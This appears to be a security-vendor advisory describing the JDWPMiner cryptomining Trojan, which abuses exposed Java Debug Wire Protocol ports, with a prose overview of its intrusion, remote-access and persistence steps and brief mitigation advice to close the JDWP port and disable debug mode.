JDWPMiner Mining Trojan

The JDWPMiner Mining Trojan is a malware threat discovered by infosec researchers. This particular malware is part of a threatening attack operation that targets installation using JDWP (Java Debug Wire Protocol). JDWP is the protocol used for communication between a debugger and the Java virtual machine it debugs. The attackers exploit an RCE (Remote Code Execution) vulnerability to deliver a mining Trojan alongside establishing control over the compromised system.

The Attack Chain

With Java being a common part of the development of all applications, any discovered vulnerabilities could allow attackers to infect a significant amount of potential victims. In JDWPMiner's case, the threat actor looks for installation where remote debugging hasn't been closed. The cybercriminals abuse a Java Debug RCE to gain illicit access and then deliver mining binaries. The payloads are fetched from an unsafe source and used to establish a mining operation. Subsequently, the resources of the system, mainly the CPU, will be diverted towards mining a specific cryptocurrency. Naturally, this would leave fewer resources for the normal operations carried out on the infected devices leading to reduced output and potential losses. 

In addition, the threat adds a key to authorized_key, which allows it to establish remote access. Then, it executes four different methods to rebound the shell and achieve total control over the host. Victims could then suffer data leaks, data loss, or other negative outcomes depending on the nefarious intentions of the attackers. The threat is also equipped with multiple persistence techniques. It uses crontab, cron.d, and rc.local to establish scheduled tasks or jobs. 

Mitigation

To prevent JDWPMiner Trojan from infiltrating your system, you can take several easy-to-implement precautions. First, close the JDWP port or consider disabling it from the Internet. If you are performing debugging in a staging environment, make sure that you disable Debug mode after completing your tasks. Disabling the Java Debug mode will also help stop the threat's intrusion.